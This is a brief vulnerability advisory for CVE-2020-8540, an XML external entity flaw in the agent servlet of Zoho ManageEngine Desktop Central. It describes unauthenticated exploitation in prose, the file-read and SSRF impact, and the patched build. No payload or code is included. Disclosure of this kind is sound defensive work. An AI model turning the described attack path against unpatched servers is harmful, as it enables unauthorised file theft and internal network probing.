CVE-2020-8540

Vulnerability

Zoho ManageEngine Desktop Central before build 10.0.479 (the 07-Mar-2020 update) contains an XML External Entity (XXE) vulnerability in the agent servlet. The server parses XML input from managed agents and does not properly disable external entity resolution, allowing a remote attacker to inject a crafted DTD into an XML request. This affects all versions prior to the fixed build. [1]

Exploitation

An unauthenticated attacker with network access to the Desktop Central server can send a specially crafted XML payload containing an external entity reference to a malicious DTD. No prior authentication or special privileges are required; the attacker only needs to be able to reach the agent servlet endpoint. [1]

Impact

Successful exploitation allows the attacker to read arbitrary files from the server filesystem (information disclosure) and to perform server-side request forgery (SSRF) attacks, potentially probing internal network resources or interacting with other internal services. The CVSS severity is not explicitly stated in the available references, but the ability to read local files and perform SSRF constitutes a high-impact information disclosure and network-level risk.

Mitigation

The vulnerability was fixed in the 07-Mar-2020 update, corresponding to build 10.0.479 and above. Administrators should upgrade to the latest build by logging into the Desktop Central console, clicking the current build number on the top-right corner, and downloading the applicable latest build. No workaround is documented; applying the patch is the only mitigation. [1]